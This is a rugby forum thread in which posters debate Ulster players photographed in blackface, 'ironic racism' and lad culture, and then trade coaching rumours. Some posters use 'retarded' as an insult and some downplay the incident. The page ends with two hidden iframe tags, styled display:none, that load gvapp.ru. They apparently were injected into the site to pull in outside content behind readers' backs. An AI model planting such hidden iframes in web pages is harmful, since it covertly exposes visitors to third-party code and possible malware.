• Help Support The Rugby Forum :

The Ulster Thread

It's lad culture. There's a large degree of "ironic racism" amongst groups of young educated adults. They will make racist jokes (in public, which is the issue for me) because "it's so obvious that we are not racist, and therefore we are showcasing how silly racism is". And yet it never appears that way to observers. Which is why it is condemned by minority groups nearly every single time.

It's a small number that do this. Unfortunately, it can infect all-male groups, like male sports teams.

tbh, lad culture has been the main reason I have not taken up rugby myself.

Ehh, I've seen the "I'm not racist so I can say racist things" argument many times. That person almost always has prejudicial views. Even then, it is obviously a touchy subject to others, so just avoid it. I'll be accused of being over-PC, but there is a broad spread.

Young lads doing stupid things. Undoubtedly they didn't mean to do any harm, but it was undoubtedly a thick thing to do.

I guess it's tough for guys like Paddy Jackson that all of the retarded stuff he does in his early 20's is going to end up in the public eye. That said, I can't believe he though blackface would be a good idea.

I guess it's tough for guys like Paddy Jackson that all of the retarded stuff he does in his early 20's is going to end up in the public eye. That said, I can't believe he though blackface would be a good idea.
This.

Stupid thing to do, should be condemned.

I personally don't see much of a problem dressing up. Clearly it might offend people especially as there is a stigma for white people to dress up as black people (because of human history, which is understandable). I would like to suggest anyone can be offended by anything. People who dress up as dead celebrities, would the families not get offended (for example dressing up as Steve Irwin), people who dress up as stereotypes of cultures or nationalities (Leprechauns from Ireland, French people covered in garlic etc.)

So you'd be fine dressing up as a holocaust victim?

Wearing blackface is stupid - dressing up as a slave is beyond retarded - to then post the photos on the internet....:rolleyes:

So you'd be fine dressing up as a holocaust victim?

Wearing blackface is stupid - dressing up as a slave is beyond retarded - to then post the photos on the internet....:rolleyes:

The holocaust was an event in human history, not a group of people. Dressing up as a holocaust victim puts significance on the event because that is what you are focusing on, not the individual people.

The holocaust was an event in human history, not a group of people. Dressing up as a holocaust victim puts significance on the event because that is what you are focusing on, not the individual people.

They wore blackface and handcuffs - a clear reference to the slave trade.

They wore blackface and handcuffs - a clear reference to the slave trade.

Where are the handcuffs? It was an Olympic themed party and they dressed as the Ethiopian team. Don't get me wrong it was silly, but I think it is blown out of proportion.

If you're offended by that I'd advise you to take up meditation or something. It calms the mind.

I'm not offended.

But you have to have led a ridiculously insular life, or be incredibly stupid to do that.

Do you not know any black people?

See this is what happens on this forum when there's no European rugby to watch.

Anyway, I don't get why you'd bother being defensive over the actions of these guys do when there's no one on here attacking them - all that's been said is that it was stupid. And it clearly was.

Anyway, the demographic of these forums are not such that we can claim to be able to judge how offensive it is, as most of us won't have relatives who were the victims of slave trade and culture; therefore I suggest we do the sensible thing and assume that what the blokes did was potentially very offensive.

Lads rumoured today that Eric Elwood and an English based coach were interviewed in a non-official base for visions if they got job.

Lads rumoured today that Eric Elwood and an English based coach were interviewed in a non-official base for visions if they got job.

Eric Elwood did a great job with Connacht, esp. bringing on younger players.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>